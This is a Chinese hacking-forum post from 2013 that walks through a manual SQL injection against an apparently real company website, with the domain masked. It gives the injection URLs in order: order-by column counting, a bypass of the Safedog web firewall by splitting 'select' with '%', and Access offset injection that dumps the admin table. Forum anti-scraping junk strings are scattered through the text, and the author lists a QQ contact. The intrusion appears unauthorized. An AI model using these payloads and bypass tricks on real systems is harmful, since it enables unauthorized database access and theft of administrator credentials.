找回密码
 立即注册
查看: 2838|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
: I7 O1 ]; y4 r) q; D* I; A7 |
! Q- ^1 V7 f, g4 F% q3 X
+ s' z) k7 b4 t顺手加个admin
) Q0 P  b2 z& M7 U
* u$ D5 z: c6 ^9 V+ H* b1 O* I2 f
( {& L6 v, F1 M2 v7 M6 e默认后台。
8 x# }2 W  l1 t& P# n/ `9 L% u# J! \回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
. d: h: f  T+ k0 j, [
8 Z/ q+ H) e/ U7 P+ J: Y6 f2 M5 ?( V& h

  @5 [9 e# z( G9 p' O% H9 A所以就不用御剑扫了,待会直接封IP。
1 c! E, `1 x7 z# x- c. B
! Z" _% m. J4 H" m用order by语句判断是否存在注入。
& x9 ]" O2 d# k+ G* a) Yhttp://www.xxx.com /product_show.asp?id=997 order by 1+ q, E: Q* g, Z
http://www.xxx.com /product_show.asp?id=997 order by 100) `* }4 p. c* u8 `$ u/ H) W6 c* x% V
现在存在注入,经测试后发现是9个字段。! I* R' V- Y0 z0 _& O6 j
" H% I% r, Q* z
接下来进行联合查询,猜是否存在admin表。
7 C- Q9 R. w+ z9 Hhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
2 F$ A. u2 y# i5 [$ [
# R8 \5 A# h# x& l$ @! |/ j3 e4 [+ u/ Z- B5 B
2 z7 K- G. P7 |& A
在select中间加个%,se%lect绕过安全狗。1 g, x9 M' b& F
5 Z9 }* E% T  z+ h- q2 p7 G3 W

7 c, R1 G9 S8 u# v2 L$ P/ e+ n8 U发现存在admin表,然后开始手工猜常用的字段。; O2 T. A4 u+ u9 P
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。/ E! O+ c/ H7 P! @( u9 Q" j

. }7 }& g5 d! l# W1 a突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
6 T1 l1 z5 O0 P0 k 0 _  [" n' [! t+ E
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
5 Y  ]9 K9 D/ S7 {0 D% Rhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin5 t$ d4 L9 a* M# Q% l
好了,敏感内容出显了。​
0 G7 I) [" ~( e* m* D8 G8 L& q" R1 z) |4 S% N

! p, [, |! u% ^6 w# ]  Q/ e+ X" c" d. J# R5 D% K$ Z3 W+ T  T9 K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表